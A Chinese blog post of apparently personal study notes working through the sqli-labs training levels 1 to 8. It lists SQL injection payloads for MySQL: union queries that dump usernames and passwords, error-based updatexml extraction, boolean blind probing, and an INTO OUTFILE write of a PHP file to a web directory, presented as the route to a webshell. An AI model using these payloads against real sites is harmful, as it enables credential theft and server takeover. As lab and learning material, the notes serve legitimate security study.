sql注入学习第一天

已于 2024-08-06 00:09:43 修改
阅读量1.5k 收藏 35
点赞数 35
文章标签: 学习
于 2024-08-06 00:09:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64362381/article/details/140932726
版权

sqllab less-1复现

复现之前进行环境搭建,在setup这步失败,原因是ubuntu下MySQL密码没有设置,设置后对配置文件进行修改

环境搭建完成

less-1

思路分析

用户get传参可控,则?id=1

加单引号

 逃脱单双引号控制,闭合单引号,他们都是成对出现,我们一个单引号会报错,另外一个单引号需要再次闭合或者注释,--+ #等进行注释,(#会进行编码=%23),进行注释

 进行联合查询,需要列数一致,所以使用order by 进行列数查询

?id=1'order by 3--+

 

可以看出为3列,多了会报错

然后让第一个表为空,显示回显前端的列,插入一个不知道的id-1,得到为第二个和第三个,所以修改2和3的值

 修改为?id=-1'union select1,user(),database()--+,获得用户权限和当前数据库

现在知道了库名,最后的目的是注入管理员账号密码,上传webshell,所以先要管理员表表名与列名,MySQL自带的三个库

 information_schema里面为信息库,包含数据库各种用户信息

查询到表名

列名

成功获取

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

less-2

无单双引号无过滤,数字型漏洞

 order by 3--+确定字段个数

通过?id=-1 select1,2,databases()--+确定数据库名

表名列名与less-1一致

?id=-1  union select 1,2,group_concat(username,password) from users--+

less-3

3与1和2类似

 

 单引号加括号的字符型注入

?id=1‘)--+

 ?id=1’)order by 3--+确定字段

by 4报错

判断回显位置

?id=1') union select 1,2,3--+

获取数据库名

?id=1') union select 1,2,database()--+

 获取数据库表名

?id=-1')  union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

 获取字段名

?id=-1')  union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

获取数据

?id=-1‘) union select 1,2,group_concat(username,password) from users--+

less-4

?id=1'

?id=1')

 ?id=1"

双引号字符型注入

剩余步骤与上面相同

?id=-1 ") union select 1,2,group_concat(username,password) from users--+

less-5

?id=1'报错

 其余显示

无回显,尝试报错注入

 获取到数据库名

?id=1' and  updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

 获取数据表名

?id=1' and  updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

获取字段

?id=-1' and    updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+

获取数据

?id=-1' and    updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)--+

 

 只能截取32位,使用substr函数截取后面位数

less-6

双引号闭合,如上

? id=1"and  updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)--+

less-7

?id=1 ')) union select 1,2,"<?php phpinfo();"into outfile"/usr/local/nginx/sqllab/web.php";--+

需要满足三个条件

mysql用户权限为root

知道网站的物理路径

/usr/local/nginx/sqllabs/less-7

secure_file_priv不能有值

常见提问MySQL如何上传webshell

使用outfile函数且满足上面三个条件

less-8

?id=1' and ascii(substr(database(),1,1,))=115--+

=115or >114来反映第一字段是多少

?id=1' and ascii(substr(database(),2,1,))=115--+

循环法

二分 法

总结

sql注入基本步骤

第一步:注入点测试

第二步:查询字段数

第三步:判断回显位

第四步:查询数据库的基本信息

第五步:爆数据库名

第六步:爆数据库表名

第七步:爆字段名

第八步:爆数据

字符型数字型判断

宛安澜
关注
python实现sql注入_python 打造一个sql注入脚本 (一)
weixin_39678103的博客
12-11 1857
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php$id=$_GET['x'];$sql="select * from news where id=$x...
sql注入第一天安全作业
08-05
安全课程第一天作业sql注入
SQL注入(一)-基础
qq_47848569的博客
05-29 2319
sql注入
第24天sql注入(小迪安全学习
m0_74741186的博客
09-30 1037
脚本代码在实现代码与数据库进行数据通讯时(从数据库中取出相关数据),将定义的SQL语句进行执行查询数据时其中的SQL语句能通过参数传递自定义值来实现控制sQL语句,从而执行恶意的SQL语句可以实现查询其他数据(数据库中的敏感数据,如管理员帐号密码)。为了网站和数据库的安全性,MYSQL内置有ROOT最高用户,划分等级,每个用户对应管理一个数据库,这样保证无不关联,从而不会影响到其他数据库的运行。information_schema:存储数据库下的数据库名及表名,列名信息的数据库。
sql注入
leekos的博客,分享web安全相关知识~
12-06 2176
sql提交注入
合天——SQL注入实验一
qq_44832048的博客
09-21 2289
实例一 通过网址:10.1.1.11:81 进入web渗透测试实验打开 在后面加'%20and%20’1'%20=%20'1(%20是空格的编码) 可以看出左右两边不一样,说明存在注入,接下来开始猜测字段数目 在root后加‘%20order%20by%205%23(先猜测有5个字段,%23 是 # 的16位url编码,用来把后面的东西注释掉) ' or...
pikachu(sql注入
m0_74394274的博客
09-19 826
大家好
第12天-Web漏洞——SQL注入之简易sql注入
MCTSOG的博客
01-19 1287
SQL注入 SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术 sql注入产生原因 接收数据 拼接数据 数据库执行 结果展示— 四个步骤,过程中处理不当就可能会存在注入漏洞 sql注入漏洞,取决于过滤严谨与否,过滤严谨,基本不可能存在sql注入漏洞,反之,就可能存在! SQL注入的危害 1.危害数据库里的数据 2.直接危害网站的权限 SQL 注入知识结构 mysql数据库注入 mysql数据库 数据库A=网站A=数据库用户A 表名——> 列名 ——>
SQL注入原理-字符型注入
T1ngSh0w的博客
09-13 9910
SQL注入原理-字符型注入
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
在网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入的类型及其提交方式,以及如何进行安全测试。 首先,...
第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
在网络安全领域,Web漏洞是常见的安全威胁之一,SQL注入是一种尤为危险的攻击方式。本文将深入探讨二次注入、加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
SQL注入攻击中,我们需要了解数据库的特性,如 MySQL、SQL Server、Oracle 等数据库管理系统的注释符、空白符、特殊符号等。例如,在 MySQL 中,注释符有三种:#、/*...*/、-- ;空格符有多种,如[0x09,0x0a-0x0d...
C#从零开始学习(类型和引用)(4)
最新发布
Hikigaya_Hachi的博客
10-19 1035
C#类型和引用学习
【PHP小课堂】一起学习PHP中的反射(一)
硬核项目经理
10-14 1202
一起学习PHP中的反射(一)反射这个名词相信大家不会陌生,但反过来说,这个反射到底是一个什么概念呢?其实反射,就是通过一些方法函数,来获得一个类或者一个实例化对象中的一些信息。当然,更重要的是,它可以是在运行时来动态获取这些信息的。这样的话,有很多功能就可以通过反射来实现了。比如说 Java 中的注解,在一些 PHP 的框架中,要实现类似的注解功能,就是通过反射来获得注释中的信息来实现的。大家可以...
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1276
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
stm32单片机个人学习笔记9(TIM输入捕获)
2302_80867398的博客
10-13 316
从模式选择Reset模式可以实现自动清零计数器CNT。
学习笔记——交换——STP(生成树)基本概念
灵韵的博客
10-16 1081
端口收到一个BPDU报文后,抽取该BPDU报文中累计根路径开销字段的值,加上该端口本身的路径开销即为累计根路径开销。从一个非根桥到达根桥的路径可能有多条,每一条路径都有一个总的开销值,此开销值是该路径上所有接收BPDU端口的端口开销总和(即BPDU的入方向端口)。STP交换机每一个端口都对应一个开销值,这个值表示数据通过端口发送时的开销,这个值与端口带宽有关,带宽越高,开销值越小。根路径开销是根据交换机之间的网段来说的,本地路径的开销也叫端口开销是针对本地的物理链路来说的相关的IETF的规定为。
React 学习计划
简序
10-15 1062
希望这个学习计划能够帮助你系统地学习React,并最终成为一名优秀的React开发者。
SQL注入详解:执行系统命令与渗透测试
SQL注入是一种常见的网络安全威胁,发生在Web应用程序未能正确处理用户输入时。当恶意用户输入特定的SQL代码,这些代码被应用程序误认为是正常的数据,从而在数据库中执行,可能导致数据泄露、系统权限获取甚至整个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值